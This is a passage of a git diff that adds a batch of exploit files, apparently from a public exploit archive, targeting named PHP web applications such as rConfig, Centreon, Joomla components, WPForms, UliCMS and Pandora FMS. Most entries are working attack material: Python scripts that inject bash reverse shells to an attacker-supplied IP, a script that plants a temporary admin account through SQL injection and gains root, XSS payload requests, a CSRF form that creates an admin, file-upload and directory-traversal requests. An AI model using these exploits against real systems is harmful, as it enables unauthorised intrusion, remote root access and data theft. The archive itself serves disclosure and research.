+      <input type="hidden" name="privilege" value="0" />
+      <input type="hidden" name="button" value="Ekle" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48241.py b/exploits/php/webapps/48241.py
new file mode 100755
index 000000000..68db0f529
--- /dev/null
+++ b/exploits/php/webapps/48241.py
@@ -0,0 +1,55 @@
+# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
+# Date: 2020-03-21
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.rconfig.com
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Version: rConfig 3.9.4
+# Tested on: Cent OS 7 (1908)
+# CVE: CVE-2020-10879
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 6:
+    print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port")
+    exit()
+
+host = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+attacker_ip = sys.argv[4]
+attacker_port = sys.argv[5]
+
+login_url = host + "/lib/crud/userprocess.php"
+payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port)
+encoded_payload = urllib.parse.quote_plus(payload)
+
+
+def exploit():
+    s = requests.Session()
+
+    res = s.post(
+        login_url,
+        data={
+            'user': username,
+            'pass': password,
+            'sublogin': 1
+        },
+        verify=False,
+        allow_redirects=True
+    )
+
+    injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload)
+    res = s.get(injection_url, verify=False)
+
+    if res.status_code != 200:
+        print("[~] Failed to connect")
+
+
+if __name__ == '__main__':
+    exploit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48242.txt b/exploits/php/webapps/48242.txt
new file mode 100644
index 000000000..589b35000
--- /dev/null
+++ b/exploits/php/webapps/48242.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
+# Dork: inurl:"index.php?option=com_hdwplayer"
+# Date: 2020-03-23
+# Exploit Author: qw3rTyTy
+# Vendor Homepage: https://www.hdwplayer.com/
+# Software Link: https://www.hdwplayer.com/download/
+# Version: 4.2
+# Tested on: Debian/Nginx/Joomla! 3.9.11
+
+##########################################################################
+#Vulnerability details
+##########################################################################
+File: components/com_hdwplayer/models/search.php
+Func: HdwplayerModelSearch::getsearch
+Line: 33
+
+    16	class HdwplayerModelSearch extends HdwplayerModel {
+    ...snip...
+    30		function getsearch() {
+    31	        $db = JFactory::getDBO();	
+    32			$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');		
+    33		$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";		//!!!
+    34	
+    35	        $db->setQuery($query);
+    36	        $output = $db->loadObjectList();		
+    37	        return($output);
+    38	    }
+    39		
+    40	}
+    41	
+    42	?>
+
+##########################################################################
+#PoC
+##########################################################################
+$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch
\ No newline at end of file
diff --git a/exploits/php/webapps/48244.txt b/exploits/php/webapps/48244.txt
new file mode 100644
index 000000000..9edd4d31c
--- /dev/null
+++ b/exploits/php/webapps/48244.txt
@@ -0,0 +1,49 @@
+# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-03-24
+# Exploit Author: SunCSR
+# Vendor Homepage: https://en.ulicms.de
+# Software Link: https://en.ulicms.de/current_versions.html
+# Version: 2020.1
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Stored Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the save page feature
+Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=<script>alert('XSS')</script>
+
+#POC
+POST /ulicms/admin/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: */*
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 866
+Origin: http://TARGET
+Connection: close
+Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7
+
+csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20
+&slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15
+&parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language=
+&meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title=
+&og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title
+&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=
+&text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme=
+&access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb
+
+### History
+=============
+2019-03-18  Issue discovered
+2019-04-18  Vendor contacted
+2019-04-18  Vendor response and hotfix
+2019-04-24  Vendor releases fixed versions
\ No newline at end of file
diff --git a/exploits/php/webapps/48245.txt b/exploits/php/webapps/48245.txt
new file mode 100644
index 000000000..fb35347b7
--- /dev/null
+++ b/exploits/php/webapps/48245.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
+# Date: 2020-02-18
+# Vendor Homepage: https://wpforms.com
+# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
+# Exploit Author: Jinson Varghese Behanan
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 1.5.8.2 and below
+# CVE : CVE-2020-10385
+
+1. Description
+
+WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sent to the attacker or redirect the super admin to another domain, for example, a phishing page designed to show that they have been logged out and would need to log back in, thus compromising their credentials. The form builder’s “preview” function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected.
+
+2. Proof of Concept
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: ptest.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 3140
+Origin: http://ptest.com
+Connection: close
+Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; comment_author_email_db156a460ca831632324809820a538ce=dev-email@flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637
+
+action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2
+
+3. Timeline
+
+Vulnerability reported to the WPForms team – February 18, 2020
+WPForms version 1.5.9 containing the fix released – March 5, 2020
\ No newline at end of file
diff --git a/exploits/php/webapps/48248.txt b/exploits/php/webapps/48248.txt
new file mode 100644
index 000000000..6b8186610
--- /dev/null
+++ b/exploits/php/webapps/48248.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
+# Google Dork: inurl:''com_gmapfp''
+# Date: 2020-03-25
+# Exploit Author: ThelastVvV
+# Vendor Homepage:https://gmapfp.org/
+# Version:* Version J3.30pro
+# Tested on: Ubuntu
+
+# PoC:
+
+http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
+
+# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg 
+
+# Dir File Path:
+
+http://127.0.0.1/images/gmapfp/file.php 
+
+or
+
+http://127.0.0.1//images/gmapfp/file.php.png
+
+# The Joomla  Gmapfp Components 3.x is allowing  
+# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads
\ No newline at end of file
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
new file mode 100644
index 000000000..01f7d3944
--- /dev/null
+++ b/exploits/php/webapps/48250.txt
@@ -0,0 +1,43 @@
+# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
+# Google Dork: "lepton cms"
+# Date: 2019-03-24
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://lepton-cms.org/english/home.php
+# Software Link:
+https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
+# Version: 4.5.0
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Persistent Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the edit page feature
+Url : http://TARGET/lepton/backend/pages/modify.php
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=<script>alert('XSS')</script>
+
+#POC
+POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680
+Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul
+Upgrade-Insecure-Requests: 1
+
+page_id=5&section_id=5&content5=<script>alert('XSS')</script>
+
+### History
+=============
+2020-03-18  Issue discovered
+2020-04-20  Vendor contacted
+2020-04-21  Vendor response and hotfix
+2020-04-23  Vendor releases fixed versions
\ No newline at end of file
diff --git a/exploits/php/webapps/48256.py b/exploits/php/webapps/48256.py
new file mode 100755
index 000000000..d8f361e2e
--- /dev/null
+++ b/exploits/php/webapps/48256.py
@@ -0,0 +1,91 @@
+# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
+# Date: 2020-03-25
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.centreon.com/
+# Version: 19.10.8
+# Tested on: CentOS
+# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce
+# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607 
+
+#!/usr/bin/python
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+req = requests.session()
+print("[+] Retrieving CSRF token...")
+loginPage = req.get(url+"/index.php")
+response = loginPage.text
+s = BeautifulSoup(response, 'html.parser')
+centreon_token = s.find('input', {'name':'centreon_token'})['value']
+
+login_creds = {
+    "useralias": username,
+    "password": password,
+    "submitLogin": "Connect",
+    "centreon_token": centreon_token
+}
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/index.php", login_creds)
+
+if "incorrect" not in login.text:
+    print("[+] Logged In, retrieving second token")
+
+    page = url + "/main.get.php?p=50118"
+    second_token_req = req.get(page)
+    response = second_token_req.text
+    s = BeautifulSoup(response, 'html.parser')
+    second_token = s.find('input', {'name':'centreon_token'})['value']
+
+    payload = {
+        "RRDdatabase_path": "/var/lib/centreon/metrics/",
+        "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
+        "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",
+        "reporting_retention": "365",
+        "archive_retention": "31",
+        "len_storage_mysql": "365",
+        "len_storage_rrd": "180",
+        "len_storage_downtimes": "0",
+        "len_storage_comments": "0",
+        "partitioning_retention": "365",
+        "partitioning_retention_forward": "10",
+        "cpartitioning_backup_directory": "/var/cache/centreon/backup",
+        "audit_log_option": "1",
+        "audit_log_retention": "0",
+        "submitC": "Save",
+        "gopt_id": "",
+        "o": "storage",
+        "o": "storage",
+        "centreon_token": second_token,
+
+
+    }
+    print("[+] Sendin payload...")
+    send_payload = req.post(page, payload)
+
+    trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
+    print("[+] Triggerring payload...")
+    trigger = req.get(trigger_url)
+
+    print("[+] Check your listener !...")
+
+else:
+    print("[-] Wrong credentials")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48258.txt b/exploits/php/webapps/48258.txt
new file mode 100644
index 000000000..240042fec
--- /dev/null
+++ b/exploits/php/webapps/48258.txt
@@ -0,0 +1,27 @@
+# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
+# Product : ECK Hotel
+# Version : 1.0-beta
+# Date: 2020-03-26
+# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download
+# Exploit Author: Mustafa Emre Gül
+# Website: https://emregul.com.tr/
+# Tested On : Win10 x64
+# Description : Simple Hotel Management System.
+
+
+PoC:
+<!--Unauthenticated Create Admin User -->
+<html>
+  <body>
+      <form action="localhost/index.php?module=user/user-add" method="POST">
+      <input type="hidden" name="nama" value="meg" />
+      <input type="hidden" name="id_user_role" value="1" />
+      <input type="hidden" name="jabatan" value="meg" />
+      <input type="hidden" name="nomor_telp" value="1" />
+      <input type="hidden" name="username" value="meg" />
+      <input type="hidden" name="password" value="meg" />
+      <input type="hidden" name="user-add" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48261.py b/exploits/php/webapps/48261.py
new file mode 100755
index 000000000..77f09a205
--- /dev/null
+++ b/exploits/php/webapps/48261.py
@@ -0,0 +1,115 @@
+# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
+# Exploit Author: vikingfr
+# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)
+# Date: 2020-03-12
+# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts  :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# Example :
+# $ python3  rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334
+# rConfig - 3.9 - Unauthenticated root RCE
+# [+] Adding a temporary admin user...
+# [+] Authenticating as dywzxuvbah...
+# [+] Logged in successfully, triggering the payload...
+# [+] Check your listener !
+# [+] The reverse shell seems to be opened :-)
+# [+] Removing the temporary admin user...
+# [+] Done.
+#
+# $ nc -nvlp 3334
+# listening on [any] 3334 ...
+# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186
+# sh: no job control in this shell
+# sh-4.2# id
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+# sh-4.2# 
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+import string
+import random
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+from requests.exceptions import Timeout
+
+print ("rConfig - 3.9 - Unauthenticated root RCE")
+
+if len(sys.argv) != 4:
+    print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")
+    exit()
+
+target = sys.argv[1]
+ip = sys.argv[2]
+port = sys.argv[3]
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+def generateUsername(stringLength=8):
+    u= string.ascii_lowercase
+    return ''.join(random.sample(u,stringLength))
+
+print ("[+] Adding a temporary admin user...")
+fake_id = str(random.randint(200,900))
+fake_user = generateUsername(10)
+fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
+fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
+userleveladmin = 9 # Administrator
+addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
+encoded_request = target+vuln_page+vuln_parameters+addUserPayload
+firstrequest = requests.session()
+exploit_req = firstrequest.get(encoded_request,verify=False)
+
+request = requests.session()
+login_info = {
+    "user": fake_user,
+    "pass": "admin",
+    "sublogin": 1
+}
+print ("[+] Authenticating as "+fake_user+"...")
+login_request = request.post(
+    target+"/lib/crud/userprocess.php",
+     login_info,
+     verify=False,
+     allow_redirects=True
+ )
+
+dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
+
+payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)
+if dashboard_request.status_code == 200:
+    print ("[+] Logged in successfully, triggering the payload...")
+    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
+    print ("[+] Check your listener !")
+    try:
+        exploit_req = request.get(encoded_request,timeout=10)  
+    except Timeout:
+        print('[+] The reverse shell seems to be opened :-)')
+    else:
+        print('[-] The command was not executed by the target or you forgot to open a listener...')
+
+elif dashboard_request.status_code == 302:
+    print ("[-] Wrong credentials !? Maybe admin were not added...")
+    exit()
+
+print("[+] Removing the temporary admin user...")
+delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"
+encoded_request = target+vuln_page+vuln_parameters+delUserPayload
+lastrequest = requests.session()
+exploit_req = lastrequest.get(encoded_request,verify=False)
+print ("[+] Done.")
\ No newline at end of file
diff --git a/exploits/php/webapps/48263.txt b/exploits/php/webapps/48263.txt
new file mode 100644
index 000000000..826d6f5d6
--- /dev/null
+++ b/exploits/php/webapps/48263.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
+#Google Dork: inurl:"index.php?option=com_fabrik"
+#Date: 2020-03-30
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://fabrikar.com/
+#Software Link: https://fabrikar.com/downloads
+#Version: 3.9
+#Tested on: Debian/Nginx/Joomla! 3.9.11
+##################################################################
+#Vulnerability details
+##################################################################
+File: fabrik_element/image/image.php
+Func: onAjax_files
+
+   394          public function onAjax_files()
+   395          {
+   396                  $this->loadMeForAjax();
+   397                  $folder = $this->app->input->get('folder', '', 'string');		//!!!Possible to directory-traversal.
+   398
+   399                  if (!strstr($folder, JPATH_SITE))
+   400                  {
+   401                          $folder = JPATH_SITE . '/' . $folder;
+   402                  }
+   403
+   404                  $pathA = JPath::clean($folder);
+   405                  $folder = array();
+   406                  $files = array();
+   407                  $images = array();
+   408                  FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
+   409
+   410                  if (!array_key_exists('/', $images))
+   411                  {
+   412                          $images['/'] = array();
+   413                  }
+   414
+   415                  echo json_encode($images['/']);
+   416          }
+##################################################################
+#PoC
+##################################################################
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"
+
+...snip...
+[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
+...snip...
+
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"
+
+...snip...
+[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
+...snip...
+##################################################################
+#Q&D Patch (DO NOT USE :3)
+##################################################################
+--- ./image.php ---
++++ image_patched.php   ---
+@@ -394,7 +394,7 @@
+        public function onAjax_files()
+        {
+                $this->loadMeForAjax();
+-               $folder = $this->app->input->get('folder', '', 'string');
++               $folder = $this->app->input->get('folder', '', 'cmd');
+ 
+                if (!strstr($folder, JPATH_SITE))
+                {
\ No newline at end of file
diff --git a/exploits/php/webapps/48280.py b/exploits/php/webapps/48280.py
new file mode 100755
index 000000000..76eca48da
--- /dev/null
+++ b/exploits/php/webapps/48280.py
@@ -0,0 +1,92 @@
+# Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution
+# Build: PC170324 - MR 0
+# Date: 2020-03-30
+# Exploit Author: Basim Alabdullah
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+#
+#                 Authenticated Remote Code Execution
+#
+#			Vulnerable file: extension/net_tools.php
+#            Vulnerable Code:
+#
+#           $traceroute = whereis_the_command ('traceroute');
+#			if (empty($traceroute)) {
+#				ui_print_error_message(__('Traceroute executable does not exist.'));
+#			}
+#			else {
+#				echo "<h3>".__("Traceroute to "). $ip. "</h3>";
